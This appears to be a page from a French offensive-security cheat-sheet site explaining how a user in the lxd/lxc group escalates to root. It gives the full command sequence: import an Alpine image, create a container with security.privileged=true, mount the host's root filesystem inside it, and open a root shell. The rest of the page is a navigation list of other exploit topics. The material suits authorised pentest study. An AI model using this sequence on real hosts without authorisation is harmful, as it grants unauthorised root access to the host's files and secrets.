Paks3c

Si notre utilisateur est membre du groupe lxd / lxc, il est possible de créer un conteneur. Cela nous donne la possibilité d'être root sur ce conteneur, de monter la racine de l'host à l'intérieur du conteneur et donc de le lire avec les droits root.

💾 Télécharger une image de conteneur Alpine Linux :

bash

wget https://dl-cdn.alpinelinux.org/alpine/v3.17/releases/x86_64/alpine-minirootfs-3.17.1-x86_64.tar.gz

🚀 Initialiser LXD au besoin:

bash

lxd init

📝 Importer l'image Alpine comme une image LXC :

bash

lxc image import alpine-minirootfs-3.17.1-x86_64.tar.gz --alias alpine

🛫 Lancer un conteneur Alpine avec des privilèges élevés :

bash

lxc init alpine r00t -c security.privileged=true`

🥞 Monter le disque de l'hôte dans le conteneur :

bash

lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true`

🐚 Accéder au shell dans le conteneur :

bash

lxc start r00t
lxc exec r00t /bin/sh

Qradar

Splunk

CheatSheet

CheatSheets

Bases

Exploits

Sudo

CSRF

DNS rebinding

Drupal

File upload

IDOR

Injection de commande

Joomla

LFI

RFI

SQL injection

SSRF

SSTI

Tomcat

Werkzeug

Wordpress

XSS

XXE

ACE ACL DACL

ADCS

Enumeration

Groupes

Trust

💾 Télécharger une image de conteneur Alpine Linux : ​

🚀 Initialiser LXD au besoin: ​

📝 Importer l'image Alpine comme une image LXC : ​

🛫 Lancer un conteneur Alpine avec des privilèges élevés : ​

🥞 Monter le disque de l'hôte dans le conteneur : ​

🐚 Accéder au shell dans le conteneur : ​

💾 Télécharger une image de conteneur Alpine Linux :

🚀 Initialiser LXD au besoin:

📝 Importer l'image Alpine comme une image LXC :

🛫 Lancer un conteneur Alpine avec des privilèges élevés :

🥞 Monter le disque de l'hôte dans le conteneur :

🐚 Accéder au shell dans le conteneur :